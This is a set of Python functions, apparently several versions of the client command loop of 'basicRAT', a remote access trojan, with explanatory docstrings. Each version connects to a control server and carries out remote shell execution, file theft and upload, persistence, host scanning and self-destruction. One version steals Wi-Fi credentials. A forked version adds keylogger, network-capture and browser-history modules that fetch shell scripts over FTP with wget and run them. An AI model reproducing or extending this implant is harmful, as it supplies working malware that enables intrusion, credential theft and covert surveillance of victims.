def client_loop(conn, dhkey):
    """Command-dispatch loop of the basicRAT client (space-delimited protocol variant).

    Each pass blocks on ``conn``, decrypts one message with ``dhkey``, splits it
    into a command word and an optional argument, runs the matching handler and
    sends the handler's text back followed by a ``"<cmd> completed."`` trailer.

    Args:
        conn: connected socket to the controlling server.
        dhkey: symmetric key shared with the server; rebound by ``'rekey'``.

    Returns:
        ``1`` after ``'kill'`` (socket closed first); ``None`` after ``'goodbye'``
        (the loop exits via ``break``).

    ``crypto``, ``toolkit``, ``persistence``, ``scan``, ``survey``, ``socket``
    and ``PLAT`` are module-level names defined outside this block.
    """
    while True:
        results = ''
        # Block until the server sends something; one recv of up to 4096 bytes
        # is treated as one complete message.
        data = crypto.decrypt(conn.recv(4096), dhkey)
        # Wire format is "<command> <action>": the first space separates them.
        cmd, _, action = data.partition(' ')
        if cmd == 'kill':
            # Close the channel and leave with a non-None status.
            conn.close()
            return 1
        elif cmd == 'selfdestruct':
            # Connection is closed before toolkit.selfdestruct (defined
            # elsewhere) runs; should that call return, the loop falls through
            # to conn.send on the already-closed socket.
            conn.close()
            toolkit.selfdestruct(PLAT)
        elif cmd == 'goodbye':
            # Orderly shutdown of both directions, then leave the loop.
            conn.shutdown(socket.SHUT_RDWR)
            conn.close()
            break
        elif cmd == 'rekey':
            # Renegotiate the shared key over the live connection.
            dhkey = crypto.diffiehellman(conn)
        elif cmd == 'persistence':
            results = persistence.run(PLAT)
        elif cmd == 'scan':
            results = scan.single_host(action)
        elif cmd == 'survey':
            results = survey.run(PLAT)
        elif cmd == 'cat':
            results = toolkit.cat(action, PLAT)
        elif cmd == 'execute':
            # Server-supplied string handed to toolkit.execute; output is
            # returned to the server below.
            results = toolkit.execute(action)
        elif cmd == 'stealwifi':
            results = toolkit.stealwifi(PLAT)
        elif cmd == 'ls':
            results = toolkit.ls(action, PLAT)
        elif cmd == 'pwd':
            results = toolkit.pwd(PLAT)
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
        elif cmd == 'wget':
            results = toolkit.wget(action)
        # Unrecognised commands fall through with empty results; every message
        # (including 'rekey' and unknown ones) is answered with this trailer.
        results += '\n{} completed.'.format(cmd)
        conn.send(crypto.encrypt(results, dhkey))
def client_loop(conn, dhkey):
    """Command-dispatch loop of the basicRAT client (JSON-framed protocol variant).

    Each pass blocks on ``conn``, decrypts one message with ``dhkey``, parses it
    as a JSON object with ``command`` and ``action`` keys, runs the matching
    handler and returns the handler's text (with a ``"<cmd> completed."``
    trailer) wrapped by ``client_to_server`` and serialised with ``dict2json``.

    Args:
        conn: connected socket to the controlling server.
        dhkey: symmetric key shared with the server (no 'rekey' in this variant).

    Returns:
        ``1`` after ``'kill'`` (socket closed first); ``None`` after ``'quit'``
        (the loop exits via ``break``).

    ``crypto``, ``toolkit``, ``persistence``, ``scan``, ``survey``, ``socket``,
    ``json2dict``, ``dict2json``, ``client_to_server`` and ``PLAT`` are
    module-level names defined outside this block.
    """
    while True:
        results = ''
        # Block until the server sends something; one recv of up to 4096 bytes
        # is treated as one complete message.
        data = crypto.decrypt(conn.recv(4096), dhkey)
        # Author's TODO: no error checking yet around recv/decrypt (either side).
        data = json2dict(data)
        # Both keys are required; a message lacking either raises KeyError here.
        cmd, action = data['command'], data['action']
        if cmd == 'kill':
            # Close the channel and leave with a non-None status.
            conn.close()
            return 1
        elif cmd == 'selfdestruct':
            # Connection is closed before toolkit.selfdestruct (defined
            # elsewhere) runs; should that call return, the loop falls through
            # to conn.send on the already-closed socket.
            conn.close()
            toolkit.selfdestruct(PLAT)
        elif cmd == 'quit':
            # Orderly shutdown of both directions, then leave the loop.
            conn.shutdown(socket.SHUT_RDWR)
            conn.close()
            break
        elif cmd == 'persistence':
            results = persistence.run(PLAT)
        elif cmd == 'scan':
            results = scan.single_host(action)
        elif cmd == 'survey':
            results = survey.run(PLAT)
        elif cmd == 'cat':
            results = toolkit.cat(action)
        elif cmd == 'execute':
            # Server-supplied string handed to toolkit.execute; output is
            # returned to the server below.
            results = toolkit.execute(action)
        elif cmd == 'ls':
            results = toolkit.ls(action)
        elif cmd == 'pwd':
            results = toolkit.pwd()
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
        elif cmd == 'wget':
            results = toolkit.wget(action)
        # Unrecognised commands fall through with empty results; trailing
        # whitespace is trimmed before the trailer is appended.
        results = results.rstrip() + '\n{} completed.'.format(cmd)
        # Reply envelope is built by client_to_server and serialised to JSON
        # before encryption (both helpers defined elsewhere).
        data = client_to_server(results)
        data = dict2json(data)
        conn.send(crypto.encrypt(data, dhkey))
def main():
    """Entry point: connect to the server and serve commands until 'kill'.

    Opens a TCP connection to ``(HOST, PORT)``, wraps it in ``common.Client``
    (which provides the AES-GCM ``recvGCM``/``sendGCM`` and file-transfer
    helpers used below) and loops forever dispatching space-delimited
    ``"<command> <action>"`` messages. Replies are sent with ``sendGCM``;
    the file-transfer commands reply through their own helpers and ``continue``.

    Never returns normally: ``'kill'`` closes the socket and calls ``sys.exit(0)``.

    ``HOST``, ``PORT``, ``plat``, ``common``, ``persistence``, ``toolkit``,
    ``survey``, ``scan``, ``socket``, ``subprocess`` and ``sys`` are module-level
    names defined outside this block.
    """
    conn = socket.socket()
    conn.connect((HOST, PORT))
    client = common.Client(conn, HOST, 1)
    while True:
        results = ''
        # Block until the server sends an encrypted message.
        data = client.recvGCM()
        # Skip empty/failed reads without replying.
        if not data:
            continue
        # Wire format is "<command> <action>": the first space separates them.
        cmd, _, action = data.partition(' ')
        # Terminate the client process.
        if cmd == 'kill':
            conn.close()
            sys.exit(0)
        # Key renegotiation is disabled in this variant (kept as history).
        # elif cmd == 'rekey':
        #     client.dh_key = crypto.diffiehellman(client.conn)
        #     continue
        # Run the server-supplied string through the system shell and return
        # combined stdout+stderr. shell=True means the operator controls the
        # full command line; nothing is validated client-side.
        elif cmd == 'execute':
            results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()
        # Direction is named from the operator's side: 'download' sends a local
        # file to the server, 'upload' receives one from it. Both reply via the
        # transfer helper and skip the sendGCM below.
        elif cmd == 'download':
            client.sendfile(action.rstrip())
            continue
        elif cmd == 'upload':
            client.recvfile(action.rstrip())
            continue
        elif cmd == 'persistence':
            results = persistence.run(plat)
            # Flag is assigned but never read within this function.
            if 'unsuccessful' not in results:
                persistence_applied = True
        elif cmd == 'wget':
            results = toolkit.wget(action)
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
        elif cmd == 'survey':
            results = survey.run(plat)
        elif cmd == 'scan':
            results = scan.single_host(action)
        elif cmd == 'selfdestruct':
            # Socket is closed before toolkit.selfdestruct (defined elsewhere);
            # if that call returns, sendGCM below runs on a closed connection.
            conn.close()
            toolkit.selfdestruct(plat)
        # Unknown commands reach here with empty results and still get a reply.
        client.sendGCM(results)
def main():
    """Entry point (CBC-era variant): DH key exchange, then a command loop.

    Connects to ``(HOST, PORT)``, derives ``DHKEY`` with ``crypto.diffiehellman``
    and then reads one 1024-byte chunk per pass, decrypting it with
    ``crypto.AES_decrypt``. Messages are ``"<command> <action>"``. Only the
    branches that produce text send a reply; file transfers go through
    ``filesock`` and 'rekey'/'quit' send nothing.

    Never returns normally: ``'quit'`` closes the socket and calls ``sys.exit(0)``.

    ``HOST``, ``PORT``, ``PLAT_TYPE``, ``crypto``, ``filesock``, ``persistence``,
    ``toolkit``, ``survey``, ``scan``, ``socket``, ``subprocess`` and ``sys`` are
    module-level names defined outside this block.
    """
    s = socket.socket()
    s.connect((HOST, PORT))
    DHKEY = crypto.diffiehellman(s)
    while True:
        # One recv is treated as one whole message; there is no empty-read
        # check in this variant, so a closed peer yields b'' straight into
        # AES_decrypt.
        data = s.recv(1024)
        data = crypto.AES_decrypt(data, DHKEY)
        # Wire format is "<command> <action>": the first space separates them.
        cmd, _, action = data.partition(' ')
        # Terminate the client process.
        if cmd == 'quit':
            s.close()
            sys.exit(0)
        # Run the server-supplied string through the system shell and send back
        # combined stdout+stderr (shell=True: the operator controls the full
        # command line).
        elif cmd == 'run':
            results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()
            s.sendall(crypto.AES_encrypt(results, DHKEY))
        # Named from the operator's side: 'download' sends local files to the
        # server, one per whitespace-separated name.
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                filesock.sendfile(s, fname, DHKEY)
        # 'upload' receives files from the server, one per name.
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                filesock.recvfile(s, fname, DHKEY)
        # Renegotiate the shared key over the live connection; no reply.
        elif cmd == 'rekey':
            DHKEY = crypto.diffiehellman(s)
        # Apply the persistence mechanism for this platform and report.
        elif cmd == 'persistence':
            results = persistence.run(PLAT_TYPE)
            s.send(crypto.AES_encrypt(results, DHKEY))
        # Fetch a file from the web.
        elif cmd == 'wget':
            results = toolkit.wget(action)
            s.send(crypto.AES_encrypt(results, DHKEY))
        # Extract a zip archive.
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
            s.send(crypto.AES_encrypt(results, DHKEY))
        # Run the system survey.
        elif cmd == 'survey':
            results = survey.run(PLAT_TYPE)
            s.send(crypto.AES_encrypt(results, DHKEY))
        # Scan a single host.
        elif cmd == 'scan':
            results = scan.single_host(action)
            s.send(crypto.AES_encrypt(results, DHKEY))
        # Unknown commands are silently ignored (no reply) in this variant.
def main():
    """Entry point: detect the platform, connect, and serve commands until 'kill'.

    Maps ``sys.platform`` onto one of ``'win'``/``'nix'``/``'mac'``/``'unk'``,
    connects to ``(HOST, PORT)``, wraps the socket in ``common.Client`` and
    dispatches space-delimited ``"<command> <action>"`` messages in
    alphabetical command order. Replies go through ``client.sendGCM``; the
    file-transfer commands reply via their own helpers and ``continue``.

    Never returns normally: ``'kill'`` closes the socket and calls ``sys.exit(0)``.

    ``HOST``, ``PORT``, ``common``, ``persistence``, ``toolkit``, ``survey``,
    ``scan``, ``socket``, ``subprocess`` and ``sys`` are module-level names
    defined outside this block.
    """
    # Normalise sys.platform to the short tags the helper modules expect.
    plat = sys.platform
    if plat.startswith('win'):
        plat = 'win'
    elif plat.startswith('linux'):
        plat = 'nix'
    elif plat.startswith('darwin'):
        plat = 'mac'
    else:
        plat = 'unk'
    # Connect to the basicRAT server.
    conn = socket.socket()
    conn.connect((HOST, PORT))
    client = common.Client(conn, HOST, 1)
    while True:
        results = ''
        # Block until the server sends an encrypted message.
        data = client.recvGCM()
        # Skip empty/failed reads without replying.
        if not data:
            continue
        # Wire format is "<command> <action>": the first space separates them.
        cmd, _, action = data.partition(' ')
        # Named from the operator's side: 'download' sends a local file to the
        # server via the transfer helper, then skips the sendGCM below.
        if cmd == 'download':
            client.sendfile(action.rstrip())
            continue
        # Run the server-supplied string through the system shell and return
        # combined stdout+stderr (shell=True: the operator controls the full
        # command line).
        elif cmd == 'execute':
            results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()
        # Terminate the client process.
        elif cmd == 'kill':
            conn.close()
            sys.exit(0)
        elif cmd == 'persistence':
            results = persistence.run(plat)
        # Key renegotiation is disabled in this variant (kept as history).
        # elif cmd == 'rekey':
        #     client.dh_key = crypto.diffiehellman(client.conn)
        #     continue
        elif cmd == 'scan':
            results = scan.single_host(action)
        elif cmd == 'selfdestruct':
            # Socket is closed before toolkit.selfdestruct (defined elsewhere);
            # if that call returns, sendGCM below runs on a closed connection.
            conn.close()
            toolkit.selfdestruct(plat)
        elif cmd == 'survey':
            results = survey.run(plat)
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
        # 'upload' receives a file from the server, then skips the reply.
        elif cmd == 'upload':
            client.recvfile(action.rstrip())
            continue
        elif cmd == 'wget':
            results = toolkit.wget(action)
        # Unknown commands reach here with empty results and still get a reply.
        client.sendGCM(results)
def main():
    """Entry point (first AES-GCM variant): DH key exchange, counter IV, command loop.

    Connects to ``(HOST, PORT)``, derives ``dh_key`` with ``crypto.diffiehellman``
    and builds one ``crypto.AES_GCM`` object from it. ``IV`` is a per-message
    counter passed to ``crypto.sendGCM`` and ``filesock.recvfile``. The socket
    is switched to non-blocking before the loop, and empty reads are skipped.

    Never returns normally: ``'kill'`` closes the socket and calls ``sys.exit(0)``.

    ``HOST``, ``PORT``, ``PLAT_TYPE``, ``crypto``, ``filesock``, ``persistence``,
    ``toolkit``, ``survey``, ``scan``, ``socket``, ``subprocess`` and ``sys`` are
    module-level names defined outside this block.
    """
    s = socket.socket()
    s.connect((HOST, PORT))
    dh_key = crypto.diffiehellman(s)
    # GCM is constructed once from the initial key and reused for the whole
    # session (see the 'rekey' note below).
    GCM = crypto.AES_GCM(dh_key)
    IV = 0
    # Non-blocking socket: recvGCM may return a falsy value when nothing has
    # arrived, which the loop treats as "no message" below.
    s.setblocking(0)
    while True:
        # Previous CBC-style receive, superseded by recvGCM (kept as history).
        #data = s.recv(1024)
        #data = crypto.AES_decrypt(data, dh_key)
        data = crypto.recvGCM(s, GCM)
        # IV advances on every pass, including passes where no data arrived.
        IV += 1
        if not data:
            continue
        # Wire format is "<command> <action>": the first space separates them.
        cmd, _, action = data.partition(' ')
        # Terminate the client process.
        if cmd == 'kill':
            s.close()
            sys.exit(0)
        # Run the server-supplied string through the system shell and send back
        # combined stdout+stderr (shell=True: the operator controls the full
        # command line).
        elif cmd == 'execute':
            results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()
            crypto.sendGCM(s, GCM, IV, results)
        # Named from the operator's side: 'download' sends local files to the
        # server, one per whitespace-separated name.
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                filesock.sendfile(s, GCM, fname)
        # 'upload' receives files from the server, one per name.
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                filesock.recvfile(s, GCM, IV, fname)
        # NOTE(review): only dh_key is rebound here; GCM, built above from the
        # original key, is not recreated, so subsequent sendGCM/recvGCM calls
        # keep using the GCM object as constructed. No reply is sent.
        elif cmd == 'rekey':
            dh_key = crypto.diffiehellman(s)
        # Apply the persistence mechanism for this platform and report.
        elif cmd == 'persistence':
            results = persistence.run(PLAT_TYPE)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))
        # Fetch a file from the web.
        elif cmd == 'wget':
            results = toolkit.wget(action)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))
        # Extract a zip archive.
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))
        # Run the system survey.
        elif cmd == 'survey':
            results = survey.run(PLAT_TYPE)
            crypto.sendGCM(s, GCM, IV, results)
            #s.send(crypto.AES_encrypt(results, dh_key))
        # Scan a single host.
        elif cmd == 'scan':
            results = scan.single_host(action)
            crypto.sendGCM(s, GCM, IV, results)
        # Unknown commands are silently ignored (no reply) in this variant.
def main():
    """Entry point: connect via ``common.Client`` and serve commands until 'kill'.

    Connects to ``(HOST, PORT)``, wraps the socket in ``common.Client`` and
    dispatches space-delimited ``"<command> <action>"`` messages. Text results
    are returned with ``client.sendGCM``; the multi-file transfer commands reply
    through ``client.sendfile``/``client.recvfile`` and ``continue``.

    Never returns normally: ``'kill'`` closes the socket and calls ``sys.exit(0)``.

    ``HOST``, ``PORT``, ``plat``, ``common``, ``persistence``, ``toolkit``,
    ``survey``, ``scan``, ``socket``, ``subprocess`` and ``sys`` are module-level
    names defined outside this block.
    """
    conn = socket.socket()
    conn.connect((HOST, PORT))
    client = common.Client(conn, HOST, 1)
    while True:
        results = ''
        # Block until the server sends an encrypted message; skip empty reads.
        data = client.recvGCM()
        if not data:
            continue
        # Wire format is "<command> <action>": the first space separates them.
        cmd, _, action = data.partition(' ')
        # Terminate the client process.
        if cmd == 'kill':
            conn.close()
            sys.exit(0)
        # Run the server-supplied string through the system shell and return
        # combined stdout+stderr (shell=True: the operator controls the full
        # command line).
        elif cmd == 'execute':
            results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()
        # Named from the operator's side: 'download' sends local files to the
        # server, one per whitespace-separated name, then skips sendGCM.
        elif cmd == 'download':
            for fname in action.split():
                fname = fname.strip()
                client.sendfile(fname)
            continue
        # 'upload' receives files from the server, one per name, then skips
        # sendGCM.
        elif cmd == 'upload':
            for fname in action.split():
                fname = fname.strip()
                client.recvfile(fname)
            continue
        # Key renegotiation is disabled in this variant (kept as history).
        # elif cmd == 'rekey':
        #     client.dh_key = crypto.diffiehellman(client.conn)
        elif cmd == 'persistence':
            results = persistence.run(plat)
        elif cmd == 'wget':
            results = toolkit.wget(action)
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
        elif cmd == 'survey':
            results = survey.run(plat)
        elif cmd == 'scan':
            results = scan.single_host(action)
        # Unknown commands reach here with empty results and still get a reply.
        client.sendGCM(results)
def main():
    """Entry point of a forked basicRAT client with extra shell-script modules.

    Same skeleton as the upstream client (platform detection, ``common.Client``
    over ``(HOST, PORT)``, space-delimited ``"<command> <action>"`` dispatch,
    replies via ``client.sendGCM``), plus three commands -- ``keylogger``,
    ``netcapture`` and ``browser_history`` -- that fetch shell scripts with
    ``wget`` from an FTP location and run them through ``/bin/sh``. Note for
    analysts: the user/host part of those FTP URLs appears as
    ``[email protected]`` in this listing, i.e. it is redacted on the source page,
    not a literal hostname. Host-side artefacts visible in this code: the
    relative directories ``keylogger/``, ``netcapture/`` and
    ``browser_history/`` under the client's working directory, a background
    ``keyslooper.sh`` process, and status/stop checks built on ``ps aux|grep``.

    Never returns normally: ``'kill'`` closes the socket and calls ``sys.exit(0)``.

    ``HOST``, ``PORT``, ``common``, ``persistence``, ``toolkit``, ``survey``,
    ``scan``, ``socket``, ``subprocess``, ``os`` and ``sys`` are module-level
    names defined outside this block.
    """
    # Normalise sys.platform to the short tags the helper modules expect.
    plat = sys.platform
    if plat.startswith('win'):
        plat = 'win'
    elif plat.startswith('linux'):
        plat = 'nix'
    elif plat.startswith('darwin'):
        plat = 'mac'
    else:
        plat = 'unk'
    # Connect to the basicRAT server.
    conn = socket.socket()
    conn.connect((HOST, PORT))
    client = common.Client(conn, HOST, 1)
    while True:
        results = ''
        # Block until the server sends an encrypted message.
        data = client.recvGCM()
        # Skip empty/failed reads without replying.
        if not data:
            continue
        # Wire format is "<command> <action>": the first space separates them.
        cmd, _, action = data.partition(' ')
        # Named from the operator's side: 'download' sends a local file to the
        # server via the transfer helper, then skips the sendGCM below.
        if cmd == 'download':
            client.sendfile(action.rstrip())
            continue
        # Run the server-supplied string through the system shell and return
        # combined stdout+stderr (shell=True: the operator controls the full
        # command line).
        elif cmd == 'execute':
            results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE, stdin=subprocess.PIPE)
            results = results.stdout.read() + results.stderr.read()
        # Keylogger module: sub-commands are carried in `action`. Where several
        # shell commands run in sequence, `results` is overwritten on each
        # iteration, so only the last command's output is reported.
        elif cmd == 'keylogger':
            if action == 'clean':
                # Fetch and run the clean-up script from the FTP location.
                action = [
                    'wget -q ftp://siic:[email protected]/keylogger/clean_keylogger.sh',
                    'sh clean_keylogger.sh'
                ]
                for i in range(len(action)):
                    results = subprocess.Popen(action[i], shell=True, stdout=subprocess.PIPE,
                                               stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                    results = results.stdout.read() + results.stderr.read()
            elif action == 'start':
                # Run the start script, then leave keyslooper.sh running in the
                # background via os.system (its output is not captured).
                action = 'sh keylogger/start_keylogger.sh'
                results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE,
                                           stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                results = results.stdout.read() + results.stderr.read()
                os.system("sh keylogger/keyslooper.sh &")
            elif action == 'stop':
                # Kills every PID whose ps line matches 'keyslooper' (including
                # the grep itself); no result text is produced.
                os.system("kill $(ps aux|grep keyslooper|awk '{print $2}')")
            elif action == 'status':
                # Reports Started/Stopped based on whether a keyslooper process
                # is present in the ps listing.
                action = "if [ \"`ps aux|grep keyslooper |grep sh |grep -v /bin/sh`\" ]; then echo Started; else echo Stopped ;fi"
                results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE,
                                           stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                results = results.stdout.read() + results.stderr.read()
            elif action == 'install':
                # Recursive wget of the keylogger/ directory into the current
                # working directory (-nH drops the host prefix).
                action = [
                    'wget -r -q --no-parent -nH ftp://siic:[email protected]/keylogger/*'
                ]
                for i in range(len(action)):
                    results = subprocess.Popen(action[i], shell=True, stdout=subprocess.PIPE,
                                               stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                    results = results.stdout.read() + results.stderr.read()
            else:
                results = 'use keylogger install | start | stop | clean'
        # Network-capture module: fetches and runs start/stop scripts; the
        # capture itself is backgrounded with os.system.
        elif cmd == 'netcapture':
            if action == 'start':
                action = 'wget -r -q --no-parent -nH ftp://siic:[email protected]/netcapture/netcapture.sh'
                results = subprocess.Popen(action, shell=True, stdout=subprocess.PIPE,
                                           stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                results = results.stdout.read() + results.stderr.read()
                os.system("sh netcapture/netcapture.sh &")
            elif action == 'stop':
                # The stop script is sourced ('.') rather than executed.
                action = [
                    'wget -r -q --no-parent -nH ftp://siic:[email protected]/netcapture/netcapture_stop.sh',
                    '. netcapture/netcapture_stop.sh'
                ]
                for i in range(len(action)):
                    results = subprocess.Popen(action[i], shell=True, stdout=subprocess.PIPE,
                                               stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                    results = results.stdout.read() + results.stderr.read()
            else:
                results = 'use netcapture start | stop'
        # Browser-history module: fetch and run a single script; `action` is
        # ignored for this command.
        elif cmd == 'browser_history':
            action = [
                'wget -r -q --no-parent -nH ftp://siic:[email protected]/browser_history/browser_history.sh',
                'sh browser_history/browser_history.sh'
            ]
            for i in range(len(action)):
                results = subprocess.Popen(action[i], shell=True, stdout=subprocess.PIPE,
                                           stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                results = results.stdout.read() + results.stderr.read()
        # Terminate the client process.
        elif cmd == 'kill':
            conn.close()
            sys.exit(0)
        elif cmd == 'persistence':
            results = persistence.run(plat)
        # Key renegotiation is disabled in this variant (kept as history).
        # elif cmd == 'rekey':
        #     client.dh_key = crypto.diffiehellman(client.conn)
        #     continue
        elif cmd == 'scan':
            results = scan.single_host(action)
        elif cmd == 'selfdestruct':
            # Socket is closed before toolkit.selfdestruct (defined elsewhere);
            # if that call returns, sendGCM below runs on a closed connection.
            conn.close()
            toolkit.selfdestruct(plat)
        elif cmd == 'survey':
            results = survey.run(plat)
        elif cmd == 'unzip':
            results = toolkit.unzip(action)
        # 'upload' receives a file from the server, then skips the reply.
        elif cmd == 'upload':
            client.recvfile(action.rstrip())
            continue
        elif cmd == 'wget':
            results = toolkit.wget(action)
        # Unknown commands reach here with empty results and still get a reply.
        client.sendGCM(results)